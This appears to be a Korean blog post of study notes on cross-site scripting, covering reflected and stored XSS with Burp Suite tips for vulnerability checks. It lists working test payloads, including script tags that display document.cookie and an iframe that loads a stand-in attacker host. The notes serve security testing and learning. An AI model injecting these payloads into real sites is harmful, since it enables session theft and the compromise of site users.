XSS (Cross Site Script)
- OWASP '인젝션' 항목에 포함됨
- Reflected 방식과 Stored 방식으로 나뉜다.
1. Reflected (반사형)
구문을 입력하면 반사하듯이 바로 보여지는 것
(query) <script>alert("zzz");</script>
이게 안먹힌다?
(query) "><script>alert("zzz");</script>
스크립트로 돌아가는 페이지인가? 생각하고 있으면 시간만 오래걸림.
걍 두개다 해보셈.
TIP. 반사형 점검할 때는 후자와 같이 그냥 막아주자. 저장형은 안막아도 ㄱㅊ
그래도 둘다 하는게 점검할 때 마음이 편하다.^^
아무튼 여러 쿼리를 질의할 수 있음.
"><script>alert("zzz");</script>
"><script>alert(document.cookie)</script>
"><iframe src='http:..attacker.co.kr"></iframe>
[개인 실습] 사이트에서 burpsuite 사용법 익히기
BurpSuite는 파라미터별로 점검하기 위해서 필수적ㅋ
BurpSuite의 대표적인 기능 - Proxy
난.. 지금까지 오픈브라우저 해서 버프수트 내 유사크롬으로 했는데..
2. Stored (저장형)
게시판 같은 곳에 게시글을 작성해놓고 html태그 넣어서 내용을 심어둔다.
웹서버에 저장되어있고, 사용자가 게시글을 클릭했을 때 동작한다.
점검 구문
<script>alert("zzz");</script>
<script>alert(document.cookie)</script>
<iframe src='http:..attacker.co.kr"></iframe>
'보안 > 웹·모바일' 카테고리의 다른 글
| 파일 다운로드 공격 실습 (0) | 2022.07.15 |
|---|---|
| 파일 업로드 취약점 실습 (0) | 2022.07.15 |
| Blind SQL Injection 실습 (0) | 2022.07.15 |
| 특수문자 필터링, 정규표현식 for JavaScript (0) | 2022.07.15 |
| Load of SQLInjection 문제풀이 (0) | 2022.07.15 |